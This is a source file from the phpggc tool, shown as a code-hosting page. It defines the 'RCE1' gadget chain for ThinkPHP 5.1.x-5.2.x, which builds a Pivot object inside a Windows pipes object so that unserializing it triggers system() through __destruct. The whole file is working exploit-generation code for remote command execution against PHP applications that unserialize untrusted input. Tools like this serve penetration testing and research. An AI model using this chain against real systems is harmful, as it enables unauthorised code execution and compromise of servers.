Codebase list phpggc / 4b9623a1-ac20-4919-ada0-6e1879642a57/upstream/0.20221129 gadgetchains / ThinkPHP / RCE / 1 / chain.php
4b9623a1-ac20-4919-ada0-6e1879642a57/upstream/0.20221129

Tree @4b9623a1-ac20-4919-ada0-6e1879642a57/upstream/0.20221129 (Download .tar.gz)

chain.php @4b9623a1-ac20-4919-ada0-6e1879642a57/upstream/0.20221129raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

namespace GadgetChain\ThinkPHP;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '5.1.x-5.2.x';
    public static $vector = '__destruct';
    public static $author = 'Smi1e';
    public static $information = '
        This chain can only execute system().
        Because the second parameter is uncontrollable
    ';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];
        $Conver = new \think\model\Pivot($parameter);
        return new \think\process\pipes\Windows($Conver);
    }
}